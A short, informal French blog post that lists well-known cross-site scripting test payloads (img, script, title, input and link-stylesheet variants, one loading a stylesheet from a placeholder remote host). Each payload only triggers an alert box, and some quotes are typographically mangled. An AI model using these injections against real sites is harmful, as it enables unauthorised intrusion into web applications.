Bonjour,
Je vais vous présenter une attaque que je trouve si dangereuse et si répandue , il s’agit de XSS attaque .
Pour la déf , hé bin désolé de vous dire que vous pouvez googler le mot sinon voici quelques exemples des codes que je trouve sympa et intéressant de le savoir :
– Image XSS en utilisant un peu du JavaScript :
<IMG SRC= »javascript:alert(‘XSS’); »>
sinon
<IMG SRC=javascript:alert(‘XSS’)>
encore
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
aussi
<IMG SRC=javascript:alert("XSS")>
celle aussi j’adore ^^
<IMG « » »><SCRIPT>alert(« XSS »)</SCRIPT> »>
– XSS en double ou simple cotes :
<SCRIPT>alert(/XSS/.source)</SCRIPT>
sinon
\ »;alert(‘XSS’);//
– Cella c’est in ze End Title Tag :
</TITLE><SCRIPT>alert(« XSS »);</SCRIPT>
– Avec un joli petit input :p :
<INPUT TYPE= »IMAGE » SRC= »javascript:alert(‘XSS’); »>
Aussi mes chers je peux vous dire qu’à travers l’appel du CSS Sheet on pourra exec du code JS tq :
<LINK REL= »stylesheet » HREF= »javascript:alert(‘XSS’); »>
ou plutot avec un remote style Sheet :
<LINK REL= »stylesheet » HREF= »http://xssxsxsxsxsxsx/xss.css »>
Woila woilou , donc faut jamais hésiter à inspecter son code pour éviter le pire ~_~)*